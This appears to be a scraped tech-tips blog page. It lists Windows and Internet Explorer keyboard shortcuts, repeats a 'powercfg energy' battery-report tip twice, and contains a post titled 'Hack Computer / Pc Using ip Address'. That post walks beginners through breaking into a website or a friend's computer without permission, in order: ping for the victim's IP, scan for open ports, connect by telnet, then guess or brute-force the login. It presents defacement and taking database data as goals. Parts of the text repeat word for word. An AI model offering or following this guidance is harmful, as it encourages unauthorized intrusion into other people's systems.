SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items
Windows Explorer Shortcuts:
CODE
ALT+SPACEBAR - Display the current window?s system menu
SHIFT+F10 - Display the item's context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item?s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item
Internet Explorer Shortcuts:
CTRL+A - Select all items on the current page
CTRL+D - Add the current page to your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or active frame
CTRL+S - Save the current page
CTRL+W - Close current browser window
CTRL+ENTER - Adds the <!-- m --><a class="postlink" href="http://www">http://www</a><!-- m -->. (url) .com
SHIFT+CLICK - Open link in new window
BACKSPACE - Go to the previous page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a document
TAB - Move forward through items on a page
END - Move to the end of a document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page focus
ALT+RIGHT ARROW - Go to the next page
SHIFT+CTRL+TAB - Move back between frames
SHIFT+F10 - Display a shortcut menu for a link
SHIFT+TAB - Move back through the items on a page
CTRL+TAB - Move forward between frames
CTRL+C - Copy selected items to the clipboard
CTRL+V - Insert contents of the clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a document
END - Move to the end of a document
F1 - Display Internet Explorer Help.....
Tagged under: Computer Tips & Hacks
Follow these steps To check
Step1: Open command prompt
To open command prompt click on start button, click run, type "command" in run box and click on ok
Step2: Write "powercfg energy" in command prompt and press enter
wait for 60 seconds, after 60 seconds a report will open in your default browser....
Check Your Laptop's Battery And Energy Report Through Command Prompt
Follow these steps To check
Step1: Open command prompt
To open command prompt click on start button, click run, type "command" in run box and click on ok
Step2: Write "powercfg energy" in command prompt and press enter
wait for 60 seconds, after 60 seconds a report will open in your default browser....
Tagged under: Computer Tips & Hacks
Hack Computer / Pc Using ip Address
Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
Confirm the website or a computer you want to hack.
Find or trace their IP address.
Make sure that IP address is online
Scan for open ports
Check for venerable ports
access through the port
Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.
Well, both of the hacking has the same process. Let’s summarize what we must do.
Confirm the website or a computer you want to hack.
Find or trace their IP address.
Make sure that IP address is online
Scan for open ports
Check for venerable ports
access through the port
Brute-force username and password
Now let me describe in brief in merely basic steps that a child can understand it.
First, getting the IP address of victim.
To get the IP address of the victim website, ping for it in command prompt.
For example,
ping www.google.com
will fetch the IP address of Google.com
This is how we can get the IP address of the victims website.
How about your friend’s PC? You can’t do www.yourfirend’sname.com, can you? Finding your friend’s IP address is little tough job, and tougher it is if he has dynamic IP address that keeps changing.
One of the widely used method to detect IP address of your friend is by chatting with him.
You might find this article helpful
Now you got the IP address right? Is it online? To know the online status just ping the IP address, if it is online it will reply.
If the IP address is online, scan for the open ports. Open ports are like closed door without locks, you can go inside and outside easily.
Use Advanced Port Scanner to scan all open and venerable ports.
Now you’ve IP address and open port address of the victim, you can now use telnet to try to access them. Make sure that you’ve telnet enabled in your computer or install it from Control panel > Add remove programs > add windows components.
Now open command prompt and use telnet command to access to the IP address. Use following syntax for connection.
telnet [IP address] [Port]
You’ll be asked to input login information.
If you can guess the informations easily then it’s OK. Or you can use some brute-forcing tools like this one.
In this way you’ll able to hack remove computer using only IP addres
Subscribe to:
Posts (Atom)

.jpg)






.jpg)



